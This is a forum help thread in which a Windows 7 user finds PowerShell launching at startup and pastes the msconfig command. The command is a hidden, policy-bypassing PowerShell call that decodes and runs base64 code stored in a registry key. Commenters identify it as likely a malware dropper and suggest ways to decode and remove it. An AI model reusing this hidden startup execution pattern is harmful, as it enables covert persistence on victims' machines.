# A script keeps popping up on startup?

Tags: windows-7, powershell

So, I restarted my entire system two days ago and after installing all the software I need I realized that whenever I turn my PC on there's something running on the start bar. I quickly checked what it is before it disappeared and it was Windows PowerShell.

Can someone explain to me why this is running when I turn my PC on, can I/should I try to stop it and can it cause problems?

Comment: Use Autoruns to determine what the filename for the script is. A process might be starting that is running it, so you will have to figure it out, it is possible to figure it out just will take considerable amount of effort on your part.

Comment: Sounds like malware to me

Comment: Looks related to http://security.stackexchange.com/questions/100020/is-this-powershell-script-an-infection

Answer (score -1):

Check your startup folder (on windows 7: start > all programs > startup). Also check msconfig's startup tab to see what is there. (Windows key + R for Run window, type msconfig)

Comment: The startup folder is empty for some reason and in msconfig it says that the manufacturer is Microsoft and the command is just huge, I'm gonna write it down here.
C:/Windows/system32/WindowsPowerShell/v1.0/powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text Encoding]::ASCII.GetString([Convert]::FromBase64String((gp'HKCU:/Software/Classes/EoIVcf').JNJJREXKMCTP))));

Should I stop this process in msconfig in the startup part and is it gonna  change something drastically?

Comment: You can temporarily disable it in msconfig to see if affects another process, it won't affect windows starting up. I am unsure of what the registry key is that it points to, maybe someone else can assist there.

Comment: I turned it off in msconfig and ran my pc again and nothing weird happened, I guess it isn't connected to any important software. I did see an option when I was installing Daemon Tools and WinRar about installing a shell. Could it just be that?

Comment: Looks like malware to me. It's base64 encoded to hide the code it's running. The command means: run the contents of the registry entry JNJJREXKMCTP under the key HKCU:\Software\Classe‌​s\EoIVcf. You can decode it yourself by opening powershell and pasting this `[Text Encoding]::ASCII.GetString([Convert]::FromBase64String((gp'HKCU:\Software\Classe‌​s\EoIVcf').JNJJREXKMCTP)))`. It's probably some sort of dropper that downloads and installs malware on your computer. Make sure to scan your PC for infections.